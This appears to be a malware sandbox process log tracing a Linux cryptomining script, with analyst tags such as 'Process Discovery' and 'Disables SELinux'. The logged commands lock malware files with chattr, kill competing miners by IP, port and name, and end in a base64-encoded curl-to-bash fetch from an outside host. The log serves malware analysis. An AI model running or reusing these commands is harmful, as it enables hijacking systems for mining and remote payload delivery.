/usr/bin/chattrchattr +i /usr/bin/systemd-network2⤵
-
-
/usr/bin/chattrchattr +i /usr/bin/pamdicks2⤵
-
-
/bin/sleepsleep 12⤵
-
-
/bin/rmrm -f /tmp/.null2⤵
-
-
/sbin/sysctlsysctl -w "vm.nr_hugepages=128"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep 194.87.139.1032⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep 185.71.65.2382⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep 140.82.52.872⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :232⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :1432⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :22222⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :33332⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :33892⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :55552⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :66662⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :66652⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :66672⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :77772⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :84442⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :33472⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :100082⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep :135312⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep :33332⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep :55552⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep "kworker -c\\"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep log_2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep systemten2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/usr/local/sbin/killkill -9 143⤵
-
-
/usr/local/bin/killkill -9 143⤵
-
-
/usr/sbin/killkill -9 143⤵
-
-
/usr/bin/killkill -9 143⤵
-
-
/sbin/killkill -9 143⤵
-
-
/bin/killkill -9 143⤵
-
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep netns2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep voltuned2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep darwin2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/dl2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/ddg2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/pprt2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/ppol2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep "/tmp/65ccE*"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep "/tmp/jmx*"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep "/tmp/2Ne80*"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep IOFoqIgyC0zmf2UR2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 45.76.122.922⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 51.38.191.1782⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 51.15.56.1612⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 86s.jpg2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep aGTSGJJp2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep nMrfmnRa2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep PuNY5tm22⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep I0r8Jyyt2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep AgdgACUD2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep uiZvwxG82⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep hahwNEdB2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep BtwXn5qH2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 3XEzey2T2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep t2tKrCSZ2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep HD7fcBgg2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep zXcDajSs2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 3lmigMo2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep AkMK4A22⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep AJ2AkKe2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep HiPxCJRS2⤵
- System Network Configuration Discovery
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep http_0xCC0302⤵
- Disables SELinux
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep http_0xCC0312⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep http_0xCC0322⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep http_0xCC0332⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep C4iLM4L2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep aziplcr72qjhzvin2⤵
- System Network Configuration Discovery
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /boot/vmlinuz2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep i4b503a52cc52⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep dgqtrcst23rtdi3ldqk322j22⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 2g0uv7npuhrlatd2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep nqscheduler2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep rkebbwgqpl4npmm2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "\$3>10.0{print \$2}"2⤵
-
-
/bin/grepgrep "]"2⤵
-
-
/bin/grepgrep -v aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 2fhtu70teuhtoh78jc5s2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 0kwti6ut420t2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 44ct7udt0patws3agkdfqnjm2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "length(\$11)>19{print \$2}"2⤵
-
-
/bin/grepgrep -v _2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/bin/grepgrep -v /2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep "\\[^"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep rsync2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep watchd0g2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/egrepegrep "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/local/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/usr/local/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/usr/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/usr/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 158.69.133.18:82202⤵
- Disables SELinux
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/java2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep gitee.com2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/java2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 104.248.4.1622⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 89.35.39.782⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /dev/shm/z3.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep kthrotlds2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep ksoftirqds2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep netdns2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep watchdogs2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep kdevtmpfsi2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep kinsing2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep redis22⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep " ps"2⤵
-
-
/bin/grepgrep -v aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/cutcut -c 9-152⤵
-
-
/bin/grepgrep sync_supers2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/cutcut -c 9-152⤵
-
-
/bin/grepgrep cpuset2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep "x]"2⤵
-
-
/bin/grepgrep -v aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep "sh] <"2⤵
-
-
/bin/grepgrep -v aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep " \\[]"2⤵
-
-
/bin/grepgrep -v aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/l.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/zmcat2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep hahwNEdB2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep CnzFVPLF2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep CvKzzZLs2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep aziplcr72qjhzvin2⤵
- System Network Configuration Discovery
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/udevd2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA2⤵
-
-
